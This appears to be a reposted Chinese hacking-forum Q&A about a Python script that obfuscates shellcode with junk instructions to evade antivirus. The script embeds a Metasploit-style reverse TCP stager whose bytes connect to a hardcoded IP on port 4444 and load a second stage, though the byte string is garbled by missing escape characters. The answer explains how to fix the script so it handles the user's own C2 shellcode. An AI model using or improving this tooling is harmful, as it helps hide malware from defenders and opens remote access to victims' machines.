记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

请教一个关于加密shellcode的py脚本

2020-08-14 20:42
我想问一下,为什么用原作者带的shellcode执行就不会报错,但是我自己用msf或者c2生成的shellcode就会报
问了一个python大佬,他说代码没问题,问题出现在数据。
因为之前看免杀的文章,经常看到这个,是哪里搞错了吗,有没有遇到过这种情况的
我看报错说的是列表索引必须是整数,而不是非类型,
asmarray[revision_unique[i]]="a"+str(revision_unique[i])+": "+asmarray[revision_unique[i]]

TypeError: list indices must be integers, not NoneType
我就把报错的参数打印了一下,发现里面有个数据是None,这种情况应该怎么解决呢

脚本链接:https://github.com/sayhi2urmom/shellcodeseperator/blob/master/main.py
from capstone import *

from keystone import *



def assemble(code):

        try:

                ks = Ks(KS_ARCH_X86, KS_MODE_32)

                encoding, count = ks.asm(code)

                return [hex(i) for i in encoding]

        except KsError as e:

                print(e)

                return -1

def byteoffset2index(offset):

        temp=offset

        a=0

        for i in md.disasm(CODE, 0x0):

                temp-=len(i.bytes)

                a+=1

                if temp==0:

                        return a

if __name__ == "__main__":

        md = Cs(CS_ARCH_X86, CS_MODE_32)

        controlflow=["jmp","jz","jnz","je","jne","call","jl","ja","loop","jecxz","jle","jge","jg","jp","jnl"]

        registers=["eax","ebx","edx","ebp","esp","edi","esi"]

        CODE = b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x6ax0bx59x50xe2xfdx6ax01x6ax02x68xeax0fxdfxe0xffxd5x97x68x02x00x11x5cx89xe6x6ax10x56x57x68xc2xdbx37x67xffxd5x85xc0x75x58x57x68xb7xe9x38xffxffxd5x57x68x74xecx3bxe1xffxd5x57x97x68x75x6ex4dx61xffxd5x6ax00x6ax04x56x57x68x02xd9xc8x5fxffxd5x83xf8x00x7ex2dx8bx36x6ax40x68x00x10x00x00x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7ex07x01xc3x29xc6x75xe9xc3xbbxf0xb5xa2x56x6ax00x53xffxd5"

        asm=";".join([i.mnemonic+" "+i.op_str for i in md.disasm(CODE, 0x0)])

        asmarray=asm.split(";")

        length=len(asmarray)

        tags=[]

        for i in range(0,len(asmarray)):

                for mnemonic in controlflow:

                        if (mnemonic in asmarray[i]):

                                tags.append(i)

        mask=[]

        for i in range(0,len(tags)):

                for reg in registers:

                        if (reg in asmarray[tags[i]]):

                                mask.append(tags[i])

        [tags.remove(i) for i in mask]

        tagins=[asmarray[i]  for i in tags]

        revision=[]

        for i in range(0,len(tagins)):

                b=tagins[i][tagins[i].index("0x"):]

                n=byteoffset2index(int(b,16))

                revision.append(n)

        revision_unique=list(set(revision))

        for i in range(0,len(revision_unique)):

                asmarray[revision_unique[i]]="a"+str(revision_unique[i])+": "+asmarray[revision_unique[i]]

        tagins=[asmarray[i]  for i in tags]

        for i in range(0,len(tags)):

                asmarray[tags[i]]=tagins[i][:tagins[i].index("0x")]+"a"+str(revision[i])

        obfuscation="nop"

        code=obfuscation+";"+(";"+obfuscation+";").join(asmarray)

        print("unsigned char buf[]="+str(assemble(code)).replace("'","").replace("[","{").replace("]","}")+";")

        print("unsigned char buf[]="+str(assemble(code)[::-1]).replace("'","").replace("[","{").replace("]","}")+";")





解答:

这是个用capstone和keystone加花指令的py脚本,他这里调用函数的时候没有设置cs_opt_skipdata参数,你可以自己添加一下。cs默认生成的shellcode你可以拖到ida里看一下,可以发现反汇编代码里是有数据区的。capstone在解析的时候到数据区发现那些指令不存在直接就停止了。


知识来源: https://www.t00ls.net/articles-57467.html

阅读:37248 | 评论:0 | 标签:加密 shellcode shell

想收藏或者和大家分享这篇好文章→复制链接地址

“请教一个关于加密shellcode的py脚本”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云